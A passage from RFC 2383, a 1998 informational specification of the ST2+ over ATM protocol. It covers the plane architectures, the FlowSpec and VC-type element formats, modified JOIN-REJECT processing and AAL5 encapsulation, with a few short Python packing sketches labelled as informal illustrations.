   The ST2+ over ATM protocol is designed to achieve the following
   goals.

   o Specify protocol interaction between ST2+ [4] and ATM on the ATM
     Forum Private UNI 3.1/4.0 (Sb point) [10, 11].

     Note: The UNI 3.1 version of the ST2+ over ATM protocol does not
     support UNI 4.0. It will be supported by the UNI 3.1/4.0 version.

Suzuki Informational [Page 2]

RFC 2383 ST2+ over ATM August 1998

   o Support ST2+ stream across ATM and non-ATM networks.

   o Define one VC on the UNI corresponding to one ST2+ hop; this VC is
     not shared with other ST2+ hops, and also this ST2+ hop is not
     divided into multiple VCs.

   o Support both SVC and PVC.

   o Not require any ATM specification changes.

   o Coexist with RFC 1483 [16] IPv4 encapsulation.

   o Coexist with RFC 1577 [17] ATMarp.

   o Coexist with RFC 1755 [18] ATM signaling for IPv4.

   o Coexist with NHRP [19].

   Because ST2+ is independent of both routing and IP address
   resolution protocols, the ST2+ over ATM protocol does not specify
   the following protocols.

   o IP-ATM address resolution protocol

   o Routing protocol

   Because the ST2+ over ATM protocol is specified for the UNI, it is
   independent of:

   o NNI protocol

   o Router/switch architecture

Suzuki Informational [Page 3]
RFC 2383 ST2+ over ATM August 1998 2. Protocol Architecture The ST2+ over ATM protocol specifies the interaction between ST2+ and ATM on the user, management, and control planes, which correspond to the three planes in ITU-T Recommendation I.321 B-ISDN Protocol Reference Model [14]. 2.1 User Plane Architecture The user plane specifies the rules for encapsulating the ST2+ Data PDU into the AAL5 [15] PDU. An user plane protocol stack is shown in Fig. 2.1. +---------------------------------+ | RFC 1819 ST2+ | | (ST2+ Data) | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +---------------------------------+ user plane | | | | | I.363.5 | | | | AAL5 | | | | | +---------------------------------+ | I.361 ATM | +---------------------------------+ | PHY | +----------------+----------------+ | UNI +--------||------- Fig. 2.1: User plane protocol stack. Suzuki Informational [Page 4]
RFC 2383 ST2+ over ATM August 1998 An example of interworking from an ATM network to an IEEE 802.X LAN is shown in Fig. 2.2. ST2+ ST2+ ST2+ Origin ATM Cloud Intermediate Agent Target +---------+ +---------+ | AP |--------------------------------------------->| AP | +---------+ +-------------------+ +---------+ |ST2+ Data|------------------>| RFC 1819 ST2+ Data|----->|ST2+ Data| +---------+ +---------+---------+ +---------+ |I.363 AAL|------------------>|I.363 AAL| SNAP |----->| SNAP | +---------+ +---------+ +---------+---------+ +---------+ |I.361 ATM|--->|I.361 ATM|--->|I.361 ATM| LLC |----->| LLC | +---------+ +---------+ +---------+---------+ +---------+ | | | | | |IEEE802.X| |IEEE802.X| | PHY |--->| PHY |--->| PHY | & 802.1p|----->| & 802.1p| +---------+ +---------+ +---------+---------+ +---------+ Fig. 2.2: Example of interworking from an ATM network to an IEEE 802.X LAN. The ATM cell supports priority indication using the CLP field; indication is also supported by the ST2+ Data PDU by using the Pri field. It may be feasible to map these fields to each other. The ST2+ over ATM protocol specifies an optional function that maps the Pri field in the ST header to the CLP field in the ATM cell. However, implementors should note that current ATM standardization tends not to support tagging. Suzuki Informational [Page 5]
RFC 2383 ST2+ over ATM August 1998 2.2 Management Plane Architecture The management plane specifies the Null FlowSpec, the Controlled-Load Service [5] FlowSpec, and the Guaranteed Service [6] FlowSpec mapping rules [8] for UNI 3.1 traffic management. A management plane protocol stack is shown in Fig. 2.3. +---------------------------------+ | Null FlowSpec | |Controlled-Load Service FlowSpec | | Guaranteed Service FlowSpec | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +---------------------------------+ management plane | | | UNI 3.1 | | | | | | Traffic Management | | | | | | VBR/UBR | | | +---------------------------------+ Fig. 2.3: Management plane protocol stack. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. The ST2+ over ATM protocol specifies the ST FlowSpec format for the Integrated Services. Basically, FlowSpec parameter negotiation, except for the MTU, is not supported. This is because, in the ST2+ environment, negotiated FlowSpec parameters are not always unique to each target. The current ATM standard does not support heterogeneous QoS to receivers. The ST2+ over ATM protocol supports FlowSpec changes by using the CHANGE message (RFC 1819, Section 4.6.5) if the I-bit in the CHANGE message is set to one and if the CHANGE message affects all targets in the stream. This is because the UNI 3.1 does not support QoS changes. The ST2+ over ATM protocol supports FlowSpec changes by releasing old ATM connections and establishing new ones. The ST2+ over ATM protocol does not support stream preemption (RFC 1819, Section 6.3). This is because the Integrated Services FlowSpec does not support the concept of precedence. Suzuki Informational [Page 6]
RFC 2383 ST2+ over ATM August 1998 It does not support the ST2+ FlowSpec (RFC 1819, Section 9.2). ST2+ FlowSpec specifies useful services, but requires a datalink layer to support heterogeneous QoS to receivers. The current ATM standard does not support heterogeneous QoS to receivers. 2.3 Control Plane Architecture The control plane specifies the rules for encapsulating the ST2+ SCMP PDU into the AAL5 [15] PDU, the relationship between ST2+ SCMP and PVC management for ST2+ data, and the protocol interaction between ST2+ SCMP and UNI 3.1 signaling [10]. A control plane protocol stack is shown in Fig. 2.4. +---------------------------------+ | RFC 1819 ST2+ | | (ST2+ SCMP) | +---------------------------------+ Point of ST2+ over ATM |/////////////////////////////////| <--- protocol specification of +------------+---+----------------+ control plane | IEEE 802 | |UNI3.1 Signaling| | SNAP | +----------------+ +------------+ | Q.2130 SSCF | | ISO 8802-2 | +----------------+ | LLC Type1 | | Q.2110 SSCOP | +------------+ +----------------+ | I.363.5 AAL5 | +---------------------------------+ | I.361 ATM | +---------------------------------+ | PHY | +----------------+----------------+ | UNI +--------||------- Fig. 2.4: Control plane protocol stack. The ST2+ over ATM protocol does not cover a VC (SVC/PVC) that transfers ST2+ SCMP. VCs for IPv4 transfer may be used for ST2+ SCMP transfer, and implementations may provide particular VCs for ST2+ SCMP transfer. Selection of these VCs depends on the implementation. Implementors should note that when ST2+ data and SCMP belong to a stream, the routing directions on the ST2+ layer must be the same. Implementors should also note that ST2+ and IPv4 directions for routing to the same IP destination address are not always the same. Suzuki Informational [Page 7]
RFC 2383 ST2+ over ATM August 1998 The ST2+ over ATM protocol supports both SVC and PVC for ST2+ Data PDU transfer. If SVC is used, the ST2+ and ATM layers establish a connection sequentially by using respectively ST2+ SCMP and UNI 3.1 signaling. An example of ST2+ SCMP and UNI 3.1 signaling message flows for establishing and releasing of ST2+ data connections is shown in Fig. 2.5, where (S) means an ST2+ entity and (Q) means a UNI 3.1 signaling entity. ATM SW ATM SW +------------+ UNI +----+ NNI +----+ UNI +------------+ ____|Intermediate|--||--| \/ |______| \/ |--||--|Intermediate|____ | (Upstream) | | /\ | | /\ | |(Downstream)| +------------+ +----+ +----+ +------------+ SCMP ------->(S)<------------------------------------------>(S)<------- \ UNI Sig. UNI Sig. / CONNECT | (Q)<--------->(Q)<-------->(Q)<--------->(Q) | -------->| | ACK <----|--------------------CONNECT------------------>| CONNECT |<---------------------ACK---------------------|--------> | |<--- ACK | | ACCEPT | |<-------- |<-------------------ACCEPT--------------------|---> ACK |----------------------ACK-------------------->| | | |->|----SETUP--->| | | | | |<-CALL PROC--|----------->|----SETUP--->|->| | | | |<----CONN----|<-| ACCEPT | |<----CONN----|<-----------|--CONN ACK-->|->| <--------|<-|--CONN ACK-->| | | | ACK ---->| | | | -------\ |--------------------------------------------\ |-------\ >| ST2+ Data >| > -------/ |--------------------------------------------/ |-------/ | | DISCONN | | -------->| | ACK <----|-------------------DISCONNECT---------------->| |<---------------------ACK---------------------| | | |->|---RELEASE-->| | | | |<-|<--REL COMP--|----------->|---RELEASE-->|->| DISCONN | | | |<--REL COMP--|<-|--------> | |<--- ACK Fig. 2.5: Example of ST2+ SCMP and UNI 3.1 signaling message flows. Suzuki Informational [Page 8]
RFC 2383 ST2+ over ATM August 1998 UNI 3.1/4.0 specifies PVC, point-to-point SVC, and point-to- multipoint SVC as VC styles. However, in actual ATM network environments, especially public ATM WANs, only PVC and bi-directional point-to-point SVC may be supported. To support the diverse VC styles, the ST2+ over ATM protocol supports the following VC styles for ST2+ Data PDU transfer. o PVC o Reuse of reverse channel of bi-directional point-to-point SVC that is used by existing stream. o Point-to-point SVC initiated from upstream side. o Point-to-multipoint SVC initiated from upstream side. o Point-to-point SVC initiated from downstream side. o Point-to-multipoint SVC initiated from downstream side (LIJ). Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support LIJ. LIJ will be supported by the UNI 3.1/4.0 version. The second style is needed in environments supporting bi-directional point-to-point SVC only. The selection of PVC and SVC styles in the ST2+ agent is based on preconfigured implementation-dependent rules. SVC supports both upstream and downstream call initiation styles. Implementors should note that this is independent of the sender- oriented and receiver-oriented ST2+ stream-building process (RFC 1819, Section 4.1.1). This is because the ST2+ over ATM protocol specifies the process for establishing ST2+ data hops on the UNI, and because the ST2+ stream building process belongs to another layer. The SVC initiation side should be determined based on the operational and billing policies between ST2+ agents; this is basically independent of the sender-oriented and receiver-oriented ST2+ stream-building process. Suzuki Informational [Page 9]
RFC 2383 ST2+ over ATM August 1998 An example of ST2+ SCMP interworking is shown in Fig. 2.6. _____ / \ (Origin ) \ / A ~~|~~ A | = | UNI Signaling | | | | +-+-+ V | | X | ATM SW | +-+-+ A SCMP | | | NNI Signaling | +-+-+ V | | X | ATM SW | +-+-+ A | | | | = | UNI Signaling V | V +-----+------+ IEEE 802.X & 802.1p | |<---------------------+ |Intermediate|--------------------+ | | |<-----------------+ | | +------------+ L2 Signaling| | | A | A | | | | = | UNI Signaling | | | SCMP | | | | | | | +-+-+ V | | | | | X | ATM SW V | | | +-+-+ A +---+-|-+ SCMP | | | NNI Signaling | \ /| | | +-+-+ V | X | |LAN SW | | X | ATM SW | / \| | | +-+-+ A +---+-|-+ | | | A | | | = | UNI Signaling | | | V __|__ V V_|_V / \ / \ (Target ) (Target ) \ / \ / ~~~~~ ~~~~~ Fig. 2.6: Example of ST2+ SCMP interworking. Suzuki Informational [Page 10]
RFC 2383 ST2+ over ATM August 1998 3. Revision of RFC 1819 ST2+ To specify the ST2+ over ATM protocol, the functions in RFC 1819 ST2+ must be extended to support ATM. However, it is difficult for the current ATM standard to support part of the specifications in RFC 1819 ST2+. This section specifies the extended, restricted, unsupported, and modified functions in RFC 1819 ST2+. Errata for RFC 1819 appears in Appendix A. 3.1 Extended Functions of RFC 1819 ST2+ 3.1.1 ST FlowSpec for Controlled-Load Service The ST2+ over ATM protocol specifies the ST FlowSpec format for the Integrated Services. Basically, FlowSpec parameter negotiation, except for the MTU, is not supported. The ST2+ intermediate agent and the target decide whether to accept or refuse the FlowSpec parameters, except for the MTU. Therefore, each of the FlowSpec parameter values other than MTU is the same at each target in the stream. The format of the ST FlowSpec for the Controlled-Load Service is shown in Fig. 3.1. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PCode = 1 | PBytes = 36 | ST FS Ver = 8 | 0(unused) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Ver=0 | 0(reserved) | Overall Length = 7 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | SVC Number |0| 0(reserved) | SVC Length = 6 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Param Num = 127| Flags = 0 | Param Length = 5 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Token Bucket Rate [r] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Token Bucket Size [b] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Peak Data Rate [p] (32-bit IEEE floating point number) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Minimum Policed Unit [m] | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Maximum Packet Size [M] | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. 3.1: Format of ST FlowSpec for Controlled-Load Service. Suzuki Informational [Page 11]
RFC 2383 ST2+ over ATM August 1998 The PCode field identifies common SCMP elements. The PCode value for the ST2+ FlowSpec is 1. The PBytes field for the Controlled-Load Service is 36 bytes. The ST FS Ver (ST FlowSpec Version) field identifies the ST FlowSpec version. The ST FlowSpec version number for the Integrated Services is 8. The Ver (Message Format Version) field identifies the Integrated Services FlowSpec message format version. The current version is zero. The Overall Length field for the Controlled-Load Service is 7 words. The SVC Number (Service ID Number) field identifies the Integrated Services. If the Integrated Services FlowSpec appears in the CONNECT or CHANGE message, the value of the SVC Number field is 1. If it appears in the ACCEPT, NOTIFY, or STATUS-RESPONSE message, the value of the SVC Number field is 5. The SVC Length (Service-specific Data Length) field for the Controlled-Load Service is 6 words. The Param Num (Parameter Number) field is 127. The Flags (Per-parameter Flags) field is zero. The Param Length (Length of Per-parameter Data) field is 5 words. Definitions of the Token Bucket Rate [r], the Token Bucket Size [b], the Peak Data Rate [p], the Minimum Policed Unit [m], and the Maximum Packet Size [M] fields are given in [5]. See section 5 of [5] for details. The ST2+ agent, that creates the FlowSpec element in the SCMP message, must assign valid values to all fields. The other agents must not modify any values in the element. The MaxMsgSize field in the CONNECT message is assigned by the origin or the intermediate agent acting as origin, and updated by each agent based on the MTU value of the datalink layer. The negotiated value of MaxMsgSize is set back to the origin or the intermediate agent acting as origin using the [M] field and the MaxMsgSize field in the ACCEPT message that corresponds to the CONNECT message. Suzuki Informational [Page 12]
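   As an informal illustration of the element layout in Fig. 3.1 and the
   field values above (not part of this specification), the following
   Python sketch packs the ST FlowSpec for the Controlled-Load Service
   in network byte order.  The function name and the in_connect flag are
   illustrative assumptions only.

      import struct

      def pack_controlled_load_flowspec(r, b, p, m, M, in_connect=True):
          # Service ID Number is 1 in CONNECT/CHANGE and 5 in ACCEPT,
          # NOTIFY, and STATUS-RESPONSE messages.
          svc_number = 1 if in_connect else 5
          element  = struct.pack("!BBBB", 1, 36, 8, 0)      # PCode, PBytes,
                                                            # ST FS Ver, unused
          element += struct.pack("!HH", 0, 7)               # Ver=0/reserved,
                                                            # Overall Length
          element += struct.pack("!BBH", svc_number, 0, 6)  # SVC Number, break
                                                            # bit/reserved,
                                                            # SVC Length
          element += struct.pack("!BBH", 127, 0, 5)         # Param Num, Flags,
                                                            # Param Length
          element += struct.pack("!fffII", r, b, p, m, M)   # [r] [b] [p] [m] [M]
          return element                                    # 36 bytes in total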
RFC 2383 ST2+ over ATM August 1998 In the original definition of the Controlled-Load Service, the value of the [m] field must be less than or equal to the value of the [M] field. However, in the ST FlowSpec for the Controlled-Load Service, if the value of the [m] field is more than that of the [M] field, the value of the [m] field is regarded as the same value as the [M] field, and must not generate an error. This is because there is a possibility that the value of the [M] field in the ACCEPT message may be decreased by negotiation. In the ST2+ SCMP messages, the value of the [M] field must be equal to or less than 65,535. In the ACCEPT message that responds to CONNECT, or the NOTIFY message that contains the FlowSpec field, the value of the [M] field must be equal to the MaxMsgSize field in the message. If these values are not the same, FlowSpec is regarded as an error. If the ST2+ agent receives the CONNECT message that contains unacceptable FlowSpec, the agent must generate a REFUSE message. 3.1.2 ST FlowSpec for Guaranteed Service Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support Guaranteed Services. It will be supported by the UNI 3.1/4.0 version. 3.1.3 VC-type common SCMP element The ST2+ over ATM protocol specifies an additional common SCMP element that designates the VC type used to support the diverse VC styles. The CONNECT and CHANGE messages that establish a hop with a VC must contain a VC-type common SCMP element. This element is valid between neighboring ST2+ agents, but must not propagate beyond the previous-hop or next-hop ST2+ agent. Suzuki Informational [Page 13]
RFC 2383 ST2+ over ATM August 1998 The format of the VC-type common SCMP element is shown in Fig. 3.2. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PCode = 8 | PBytes = 20 | VCType | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | PVCIdentifer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0(unused) | UniqueID | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | OriginIPAddress | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | LIJCallIdentifer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. 3.2: Format of VC-type common SCMP element. The PCode field identifies the common SCMP elements. The PCode value for the VC type is 8. The PBytes field for the VC type is 20 bytes. The VCType field identifies the VC type. The correspondence between the value in this field and the meaning is as follows: 0: ST2+ data stream uses a PVC. 1: ST2+ data stream uses the reverse channel of the bi- directional point-to-point SVC used by the existing stream. 2: ST2+ data stream is established by a point-to-point SVC initiated from the upstream side. 3: ST2+ data stream is established by a point-to-multipoint SVC initiated from the upstream side. 4: ST2+ data stream is established by a point-to-point SVC initiated from the downstream side. 5: ST2+ data stream is established by a point-to-multipoint SVC initiated from the downstream side. Note: The UNI 3.1 version of the ST2+ over ATM protocol does not support VCType 5. It will be supported by the UNI 3.1/4.0 version. Suzuki Informational [Page 14]
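   As an informal illustration (not part of this specification), the
   following Python sketch packs the VC-type common SCMP element of
   Fig. 3.2 in network byte order, leaving the fields that are not valid
   for the given VCType at zero, as described below.  The function and
   parameter names are illustrative assumptions only.

      import struct
      from ipaddress import IPv4Address

      def pack_vc_type_element(vc_type, pvc_id=0, unique_id=0,
                               origin_ip="0.0.0.0", lij_call_id=0):
          # PVCIdentifer is valid only for VCType 0, UniqueID and
          # OriginIPAddress (the SID of the stream occupying the forward
          # channel) only for VCType 1, and LIJCallIdentifer only for
          # VCType 5.
          return struct.pack(
              "!BBHIHHII",
              8, 20, vc_type,                         # PCode, PBytes, VCType
              pvc_id if vc_type == 0 else 0,          # PVCIdentifer
              0,                                      # unused
              unique_id if vc_type == 1 else 0,       # UniqueID
              int(IPv4Address(origin_ip)) if vc_type == 1 else 0,
                                                      # OriginIPAddress
              lij_call_id if vc_type == 5 else 0)     # LIJCallIdentifer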
RFC 2383 ST2+ over ATM August 1998 The PVCIdentifer field identifies the PVC identifier uniquely assigned between neighboring ST2+ agents. This field is valid only when the VCType field is zero. The UniqueID and OriginIPAddress fields identify the reverse channel of the bi-directional point-to-point SVC that is used by this SID. These fields are valid only when the VCType field is 1. The LIJCallIdentifer field identifies the LIJ Call Identifier for point-to-multipoint SVC. This field is valid only when the VCType field is 5. 3.1.4 Reason Code The extension of the Reason Code (RFC 1819, Section 10.5.3) to the ST2+ over ATM protocol is shown below. 57 CantChange Partial changes not supported. 58 NoRecover Stream recovery not supported. 3.2 Restricted Functions of RFC 1819 ST2+ 3.2.1 FlowSpec changes In the following case, the ST2+ over ATM protocol supports stream FlowSpec changes by using the CHANGE message. o The I-bit is set to 1 and the G-bit is set to 1. In the following case, the CHANGE fails and a REFUSE message, with the E and N-bits set to 1 and the ReasonCode set to CantChange, is propagated upstream. o The I and/or G-bits are set to zero. 3.3 Unsupported Functions of RFC 1819 ST2+ 3.3.1 ST2+ FlowSpec The ST2+ over ATM protocol does not support the ST2+ FlowSpec (RFC 1819, Section 9.2). The ST2+ FlowSpec specifies useful services, but requires the datalink layer to support heterogeneous QoS to receivers. The current ATM standard does not support heterogeneous QoS to receivers. Suzuki Informational [Page 15]
RFC 2383                    ST2+ over ATM                    August 1998

3.3.2 Stream preemption

   The ST2+ over ATM protocol does not support stream preemption (RFC
   1819, Section 6.3).  This is because the Integrated Services
   FlowSpec does not support the concept of precedence.

3.3.3 HELLO message

   Implementations may not support the HELLO message (RFC 1819,
   Section 10.4.7) and thus ST2+ agent failure detection using the
   HELLO message (RFC 1819, Section 6.1.2).  This is because ATM has an
   adequate failure detection mechanism, and the HELLO message is not
   sufficient for detecting link failure in the ST2+ over ATM protocol,
   because the ST2+ data and the ST2+ SCMP are forwarded through
   another VC.

3.3.4 Stream recovery

   Implementors must select the NoRecover option of the CONNECT message
   (RFC 1819, Section 4.4.1) with the S-bit set to 1.  This is because
   the descriptions of the stream recovery process in RFC 1819
   (Sections 5.3.2, 6.2, and 6.2.1) are unclear and incomplete.  It is
   thus possible that if a link failure occurs and several ST2+ agents
   detect it simultaneously, the recovery process may encounter
   problems.  The ST2+ over ATM protocol does not support stream
   recovery.  If recovery is needed, the application should support it.

   A CONNECT message in which the NoRecover option is not selected will
   fail; a REFUSE message in which the N-bit is set to 1 and the
   ReasonCode is set to NoRecover is then propagated upstream.

3.3.5 Subnet Resources Sharing

   The ST2+ over ATM protocol does not support subnet resources sharing
   (RFC 1819, Section 7.1.4).  This is because ATM does not support the
   concept of the MAC layer.

3.3.6 IP encapsulation of ST

   The ST2+ over ATM protocol does not support IP encapsulation of ST
   (RFC 1819, Section 8.7), because there is no need to implement IP
   encapsulation in this protocol.

3.3.7 IP Multicasting

   The ST2+ over ATM protocol does not support IP multicasting (RFC
   1819, Section 8.8), because this protocol does not support IP
   encapsulation of ST.

Suzuki                       Informational                     [Page 16]
RFC 2383                    ST2+ over ATM                    August 1998

3.4 Modified Functions of RFC 1819 ST2+

   The ST2+ receiver-oriented stream creation procedure has some fatal
   problems: the value of the LnkReference field in the CONNECT message
   that is a response to a JOIN message is not valid, the ST2+ agent
   cannot update the LnkReference field in the JOIN-REJECT message, and
   the ST2+ agent cannot deliver the JOIN-REJECT message to the target
   because the JOIN-REJECT message does not contain a TargetList field.
   To solve these problems, the ST2+ over ATM protocol modifies the
   ST2+ protocol processing rules.

3.4.1 Modifications of Message Processing Rules

   Modifications of the CONNECT, JOIN, and JOIN-REJECT message
   processing rules in the ST2+ over ATM protocol are described in the
   following.

   o The target that creates a JOIN message assigns the same value as
     in the Reference field to the LnkReference field.

   o The agent that creates a CONNECT message as a response to a JOIN
     message assigns the same value as in the LnkReference field in the
     JOIN message to the LnkReference field.  In other cases, the value
     of the LnkReference field in a CONNECT message is zero.

   o The agent that creates a JOIN-REJECT message assigns the same
     value as in the LnkReference field in the JOIN message to the
     LnkReference field.

   o An intermediate agent must not modify the value of the
     LnkReference field in the CONNECT, JOIN, or JOIN-REJECT message.
     Note that this rule differs from the LnkReference field processing
     rule in the ACCEPT and REFUSE messages.

Suzuki                       Informational                     [Page 17]
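   As an informal illustration of the rules above (not part of this
   specification), the following Python sketch shows how the
   LnkReference value set by a target in a JOIN is echoed back in the
   CONNECT or JOIN-REJECT that answers it.  The message objects are
   plain dictionaries and all names are illustrative only.

      def make_join(reference):
          # The target mirrors its own Reference into LnkReference.
          return {"Reference": reference, "LnkReference": reference}

      def make_connect(reference, answered_join=None):
          # A CONNECT answering a JOIN copies the JOIN's LnkReference;
          # any other CONNECT carries LnkReference = 0.
          lnk = answered_join["LnkReference"] if answered_join else 0
          return {"Reference": reference, "LnkReference": lnk}

      def make_join_reject(reference, join, reason_code):
          # A JOIN-REJECT copies the JOIN's LnkReference and echoes the
          # JOIN's TargetList so that it can be delivered to the target.
          return {"Reference": reference,
                  "LnkReference": join["LnkReference"],
                  "ReasonCode": reason_code,
                  "TargetList": list(join.get("TargetList", []))}

      # Intermediate agents forward these messages without modifying the
      # LnkReference field.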
RFC 2383                    ST2+ over ATM                    August 1998

3.4.2 Modified JOIN-REJECT Control Message

   The modified JOIN-REJECT control message in the ST2+ over ATM
   protocol is shown in Fig. 3.3.

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  OpCode = 9   |       0       |          TotalBytes           |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Reference           |         LnkReference          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        SenderIPAddress                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |          ReasonCode           |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                      GeneratorIPAddress                       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   :                           TargetList                          :
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                  Fig. 3.3: JOIN-REJECT Control Message.

   The TargetList field is assigned the same TargetList as in the JOIN
   message that corresponds to the JOIN-REJECT message.

4. Protocol Specification of the User Plane

   This section specifies the AAL5 PDU encapsulation for the ST2+ Data
   PDU.

4.1 Service Primitives Provided by User Plane

4.1.1 Overview of interactions

   The ST2+ data layer entity on the user plane of the ST2+ over ATM
   protocol provides the following services to the upper layer.

   o st2p_unitdata.req

   o st2p_unitdata.ind

4.1.1.1 St2p_unitdata.req

   The st2p_unitdata.req primitive sends a request for an ST2+ Data PDU
   transfer to the ST2+ data layer entity.  The semantics of the
   primitive are as follows:

Suzuki                       Informational                     [Page 18]
RFC 2383 ST2+ over ATM August 1998 st2p_unitdata.req ( pri, sid, data ) The pri parameter specifies priority of ST2+ Data PDU. The sid parameter specifies SID of ST2+ Data PDU. The data parameter specifies ST2+ data to be transferred. 4.1.1.2 St2p_unitdata.ind The st2p_unitdata.ind primitive indicates an ST2+ Data PDU delivery from the ST2+ data layer entity. The semantics of the primitive are as follows: st2p_unitdata.ind ( pri [optional], sid, data, status [optional] ) The pri parameter indicates priority of ST2+ Data PDU, if AAL5 is used for encapsulating the ST2+ Data PDU. The sid parameter indicates SID of ST2+ Data PDU. The data parameter indicates delivered ST2+ data. The status is an optional parameter that indicates whether the delivered ST2+ data is corrupt or not. 4.2 Service Primitives Provided by AAL5 4.2.1 Requirements for AAL5 The requirements for the AAL5 layer on the ST2+ over ATM user plane are as follows: o The SSCS must be null. o Implementations must use message-mode service. Note: Selection of the corrupted SDU delivery option on the receiver side depends on the implementation, so the receiver may or may not be able to select this option. 4.2.2 Overview of Interactions The AAL5 layer entity on the ST2+ over ATM user plane provides the following services to the ST2+ data layer. Suzuki Informational [Page 19]
RFC 2383                    ST2+ over ATM                    August 1998

   o AAL5_UNITDATA.req

   o AAL5_UNITDATA.ind

4.2.2.1 AAL5_UNITDATA.req

   The AAL5_UNITDATA.req primitive sends a request for an AAL5 data
   (AAL5 CPCS_SDU) transfer from the ST2+ data layer entity to the AAL5
   layer entity.  The semantics of the primitive are as follows:

      AAL5_UNITDATA.req ( DATA, CPCS_LP, CPCS_UU )

   The DATA parameter specifies the AAL5 data to be transferred.  The
   CPCS_LP parameter specifies the value of the CLP field in the ATM
   cell.  The CPCS_UU parameter specifies the user-to-user data to be
   transferred.

4.2.2.2 AAL5_UNITDATA.ind

   The AAL5_UNITDATA.ind primitive indicates an AAL5 data (AAL5
   CPCS_SDU) delivery from the AAL5 layer entity to the ST2+ data layer
   entity.  The semantics of the primitive are as follows:

      AAL5_UNITDATA.ind ( DATA, CPCS_LP, CPCS_UU, STATUS [optional] )

   The DATA parameter indicates the delivered AAL5 data.  The CPCS_LP
   parameter indicates the value of the CLP field in the ATM cell.  The
   CPCS_UU parameter indicates the delivered user-to-user data.  The
   STATUS parameter indicates whether the delivered AAL5 data is
   corrupt or not.  The STATUS parameter is an optional parameter, and
   valid only when the corrupted SDU delivery option is selected.

4.3 AAL5 Encapsulation for ST2+ Data PDU

4.3.1 Mapping from st2p_unitdata.req to AAL5_UNITDATA.req

   The ST2+ Data PDU is directly assigned to the DATA parameter in
   AAL5_UNITDATA.req.  That is, as shown in Fig. 4.1, the ST2+ Data PDU
   is mapped to the payload of AAL5 CPCS_PDU.

Suzuki                       Informational                     [Page 20]
RFC 2383                    ST2+ over ATM                    August 1998

      +-------+---------------------------+
      | ST    |         ST2+ data         |  ST2+
      | header|                           |  Data PDU
      +-------+---------------------------+
      :                                   :
      :                                   :
   +-----------------------------------+---+--------+
   |             CPCS_PDU              |PAD|CPCS_PDU|  AAL5
   |             payload               |   |trailer |  CPCS_PDU
   +-----------------------------------+---+--------+

         Fig. 4.1: Mapping of ST2+ data to AAL5 CPCS_PDU payload.

   The value of CPCS_LP in AAL5_UNITDATA.req depends on the
   implementation: 1 (low priority) or zero (high priority) may be
   assigned permanently, or the value may be assigned depending on the
   value of pri in st2p_unitdata.req.

   The value of the CPCS_UU indication field in AAL5_UNITDATA.req is
   set to zero.

4.3.2 Mapping from AAL5_UNITDATA.ind to st2p_unitdata.ind

   The DATA parameter in AAL5_UNITDATA.ind is directly assigned to the
